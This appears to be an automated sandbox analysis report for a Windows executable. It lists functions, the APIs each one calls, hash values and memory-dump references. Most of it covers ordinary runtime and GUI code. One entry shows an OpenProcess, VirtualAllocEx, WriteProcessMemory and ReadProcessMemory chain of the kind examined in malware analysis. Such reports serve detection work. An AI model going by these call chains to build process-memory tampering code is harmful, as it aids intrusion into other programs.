Instruction ID: fcb6afef9bf14232aed0a2565e7e3c0099bc22d36e1514db90967f5f2333a981
Opcode Fuzzy Hash: c18d710ded64dc96bc542cf3b5c065ebfa722cd7cb7082d48ba48316ec425213
Instruction Fuzzy Hash: F001B5A1645A0ABBE20C5521AD86FBF7B5CFB613E4F008420FE0D9A241F7A1ED1093B4

Function 00542DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0053F2DE,00543863,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6), ref: 00542DFD
_free.LIBCMT ref: 00542E32
_free.LIBCMT ref: 00542E59
SetLastError.KERNEL32(00000000,00511129), ref: 00542E66
SetLastError.KERNEL32(00000000,00511129), ref: 00542E6F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 76c2689cfbad3c8a1f9cb3947a359a94b925a4d4da3c3d8d4333b21a5c38109b
Instruction ID: 7094b51df13324a460dbb4d6c166e14bc6fde269b9d143d75abd364b87b12f74
Opcode Fuzzy Hash: 76c2689cfbad3c8a1f9cb3947a359a94b925a4d4da3c3d8d4333b21a5c38109b
Instruction Fuzzy Hash: 9A01263210562267871263752C49DFB3E6DBBE13ACFA04426F41593192EE708C149020

Function 0057000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?,?,0057035E), ref: 0057002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?), ref: 00570064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570070

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 6537f40b0cda1fb16244e354d73a21bc9fd15649829f3c76dd819279baac11ba
Instruction ID: 693e5b2af9e0729885dc1859e284c5da0ef7a492c6ca17c16235ec61ae867d90
Opcode Fuzzy Hash: 6537f40b0cda1fb16244e354d73a21bc9fd15649829f3c76dd819279baac11ba
Instruction Fuzzy Hash: 46018B72600205FFDB104F69EC08BAA7EEDFB547A2F14A124F909D2250EB75DD44BBA0

Function 0057E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0057E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0057E9A5
Sleep.KERNEL32(00000000), ref: 0057E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0057E9B7
Sleep.KERNEL32 ref: 0057E9F3

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 3293825c91df3bfa04182e8f917a2a17ab8bd7763472831cac6621a360356396
Instruction ID: 1a027cc55a0d5889e96598723f7ee57a72e8a5a2f720b357d7223f34b26a0757
Opcode Fuzzy Hash: 3293825c91df3bfa04182e8f917a2a17ab8bd7763472831cac6621a360356396
Instruction Fuzzy Hash: 71015B72D01629DBCF009BE4E85AADDBF78BF1E301F004586E606B2241CB309559EB61

Function 005710F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00571114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 0057112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0057114D

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: f6a2cf74d7a01e6596447bdf6e8af8dfe1c6b489c74989028028e8569a8ae2f5
Instruction ID: c6136f9fc9b8287e4255750945e0d6448a2bf261b42c9600f0abccdcd726c832
Opcode Fuzzy Hash: f6a2cf74d7a01e6596447bdf6e8af8dfe1c6b489c74989028028e8569a8ae2f5
Instruction Fuzzy Hash: 08011975200605BFDB114FA9EC49A6A3F6EFF8A3A0B604419FA45D7360DA31DD04EA60

Function 00570FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00570FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00570FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00570FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00570FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00571002

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: c45069ca284d4fd7f6399ac621f8fbb70e8bc9340150943286064622f09ba86d
Instruction ID: fb6028b963192fc27c0e25af8a7c0bd5262cba8585d98445d484def58dba836d
Opcode Fuzzy Hash: c45069ca284d4fd7f6399ac621f8fbb70e8bc9340150943286064622f09ba86d
Instruction Fuzzy Hash: 7CF04935200701ABDB214FA9AC4DF5A3FADFF9A762F104415FA49C6251EE70DC54AA60

Function 00571014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0057102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00571036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00571045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0057104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00571062

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: d5f4b3ebc07cdc12eb6636ac184be9f7786526de063174e18f9b7b78d1e892d5
Instruction ID: 2fa8470c3eb9a693007dc5b96c8b49590f76c8b5d46856077688edcdbde6c1f6
Opcode Fuzzy Hash: d5f4b3ebc07cdc12eb6636ac184be9f7786526de063174e18f9b7b78d1e892d5
Instruction Fuzzy Hash: 9DF04935200701ABDB215FAAEC4DF5A3FADFF9A761F104415FA49C6250DE70D854AA60

Function 0058030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 00580324
CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 00580331
CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 0058033E
CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 0058034B
CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 00580358
CloseHandle.KERNEL32(?,?,?,?,0058017D,?,005832FC,?,00000001,00552592,?), ref: 00580365

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7834c3ed929462e4082d5966cb35c3af576849a463b1935eef56009c7957ac67
Instruction ID: 63279650871853044fdf335bb996c966c14b476cf46726462eed549cd631cf13
Opcode Fuzzy Hash: 7834c3ed929462e4082d5966cb35c3af576849a463b1935eef56009c7957ac67
Instruction Fuzzy Hash: 10019C72801B159FCB30AF66D880816FBF9BE602163159E3FD19662971CBB1A958DF80

Function 0054D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0054D752

Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0

_free.LIBCMT ref: 0054D764
_free.LIBCMT ref: 0054D776
_free.LIBCMT ref: 0054D788
_free.LIBCMT ref: 0054D79A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0e09515219e6085af8511fe0c43ee2f152e8a18f32f9bde6045214b719798093
Instruction ID: 13e23af86243c5d14f9ed30e9a6b8df4a749c514032d72bdaff7f8b76eb33a5f
Opcode Fuzzy Hash: 0e09515219e6085af8511fe0c43ee2f152e8a18f32f9bde6045214b719798093
Instruction Fuzzy Hash: 46F04F32541216AB8621EB65F9C5D967FFDFB44318BD40806F049D7502C734FC809670

Function 00575C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00575C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00575C6F
MessageBeep.USER32(00000000), ref: 00575C87
KillTimer.USER32(?,0000040A), ref: 00575CA3
EndDialog.USER32(?,00000001), ref: 00575CBD

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: ac88b2363bdaaa7499b7834fec45fe70df19d3109fe8213ee3b6bd6814aee176
Instruction ID: fb1d42a86d788f89ca4a9de9a2f5bc9cf14a09e9d727cd8c61a7b81790096234
Opcode Fuzzy Hash: ac88b2363bdaaa7499b7834fec45fe70df19d3109fe8213ee3b6bd6814aee176
Instruction Fuzzy Hash: 88018630500B04ABEB215B14ED4EFA67FFCBB11B05F044559A587A20E1EBF0AD88AA90

Function 005422A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 005422BE

Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0

_free.LIBCMT ref: 005422D0
_free.LIBCMT ref: 005422E3
_free.LIBCMT ref: 005422F4
_free.LIBCMT ref: 00542305

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6a2b031925cebc4a2d359f9b5ac1a6920efaee68420e7bb23758ae22cf4c424d
Instruction ID: 6e6b9053c052ea30b8df7a7fa076dd89f6a959f781c5bc0cc975154efe4965d6
Opcode Fuzzy Hash: 6a2b031925cebc4a2d359f9b5ac1a6920efaee68420e7bb23758ae22cf4c424d
Instruction Fuzzy Hash: 66F0B4784015B29B8A26AF56BC8188C3F74F738764F801107F058DA2B1C7710496FFE8

Function 005295C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 005295D4
StrokeAndFillPath.GDI32(?,?,005671F7,00000000,?,?,?), ref: 005295F0
SelectObject.GDI32(?,00000000), ref: 00529603
DeleteObject.GDI32 ref: 00529616
StrokePath.GDI32(?), ref: 00529631

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 1de2066f372abafc33b299c12c1ac75a756c330819fcff9d7bc5cd86e80e004b
Instruction ID: 200df3aa9b78b2f16348f5e6e0a2d62ff1a6f020dfa8d45f27de7e33c17c2d95
Opcode Fuzzy Hash: 1de2066f372abafc33b299c12c1ac75a756c330819fcff9d7bc5cd86e80e004b
Instruction Fuzzy Hash: 11F04F31105A48EBDB1A5F65ED5C7683FA1BF22322F048214F4A5991F2CB348999FF28

Function 00540F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 005410F9
__freea.LIBCMT ref: 00541117

Part of subcall function 00541537: _free.LIBCMT ref: 0054154F

Strings

a/p, xrefs: 005411DE
am/pm, xrefs: 0054117A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 80df0facff56a307b35277d354b267233c5c8cfe930299b035d27d01bf7ca494
Instruction ID: b3fb87df8b0c21aec00abaf69fc268ed9dd220c54b0c1d378f7e8fd52fd1d0f7
Opcode Fuzzy Hash: 80df0facff56a307b35277d354b267233c5c8cfe930299b035d27d01bf7ca494
Instruction Fuzzy Hash: 40D14835900A06DBCB288F68C859BFEBFB1FF05708F244919E9169B650D3759DC0CB99

Function 005961D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 00530242: EnterCriticalSection.KERNEL32(005E070C,005E1884,?,?,0052198B,005E2518,?,?,?,005112F9,00000000), ref: 0053024D
Part of subcall function 00530242: LeaveCriticalSection.KERNEL32(005E070C,?,0052198B,005E2518,?,?,?,005112F9,00000000), ref: 0053028A

Part of subcall function 005300A3: __onexit.LIBCMT ref: 005300A9

__Init_thread_footer.LIBCMT ref: 00596238

Part of subcall function 005301F8: EnterCriticalSection.KERNEL32(005E070C,?,?,00528747,005E2514), ref: 00530202
Part of subcall function 005301F8: LeaveCriticalSection.KERNEL32(005E070C,?,00528747,005E2514), ref: 00530235

Part of subcall function 0058359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 005835E4
Part of subcall function 0058359C: LoadStringW.USER32(005E2390,?,00000FFF,?), ref: 0058360A

Strings

x#^, xrefs: 0059636F
x#^, xrefs: 00596353
x#^, xrefs: 0059633A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#^$x#^$x#^
API String ID: 1072379062-3539263148
Opcode ID: de84732fc6906404ec6238190564033d2acdd144cf554ff4658f3047d54c4588
Instruction ID: b7042cb355b1f99f464c70204d58ead184cd3a5e64363a337f8234473ba18ccd
Opcode Fuzzy Hash: de84732fc6906404ec6238190564033d2acdd144cf554ff4658f3047d54c4588
Instruction Fuzzy Hash: 11C17B71A00106AFDF14DF98C895EAEBBB9FF48300F118469F945AB291DB70ED49CB90

Function 00548A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00548B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00548B7A
__dosmaperr.LIBCMT ref: 00548B81

Strings

.S, xrefs: 00548A63

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: .S
API String ID: 2434981716-1539595904
Opcode ID: b00082088acc37bbf87162f7e33cde85b6b5a706494779aad554395f90418ada
Instruction ID: 61160430dc0af42a2c6ce47f131ebf2d9356acf99187ec2df56aaa95f0567b98
Opcode Fuzzy Hash: b00082088acc37bbf87162f7e33cde85b6b5a706494779aad554395f90418ada
Instruction Fuzzy Hash: 40419D70604045AFCB249F25CC84AFD7FE5FB8631CF2885AAF8958B242DE71CC429790

Function 00572716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0057B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721D0,?,?,00000034,00000800,?,00000034), ref: 0057B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00572760

Part of subcall function 0057B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0057B3F8

Part of subcall function 0057B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0057B355
Part of subcall function 0057B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00572194,00000034,?,?,00001004,00000000,00000000), ref: 0057B365
Part of subcall function 0057B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00572194,00000034,?,?,00001004,00000000,00000000), ref: 0057B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005727CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0057281A

Strings

@, xrefs: 00572832

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 064dbbebfd5c402402e3f11513dd621facdad38784f15445ffb929dc226f0c2f
Instruction ID: b7b3cf812bcab17bab430310755f0f5b6b993fc0ed95593300527fad4b2626ab
Opcode Fuzzy Hash: 064dbbebfd5c402402e3f11513dd621facdad38784f15445ffb929dc226f0c2f
Instruction Fuzzy Hash: 9A416D72900219AFDB10DBA4DD45BDEBBB8FF45300F108099FA59B7181DB706E85DBA1

Function 0054172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4sfN3Gx1vO.exe,00000104), ref: 00541769
_free.LIBCMT ref: 00541834
_free.LIBCMT ref: 0054183E

Strings

C:\Users\user\Desktop\4sfN3Gx1vO.exe, xrefs: 00541760, 00541767, 00541796, 005417CE

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
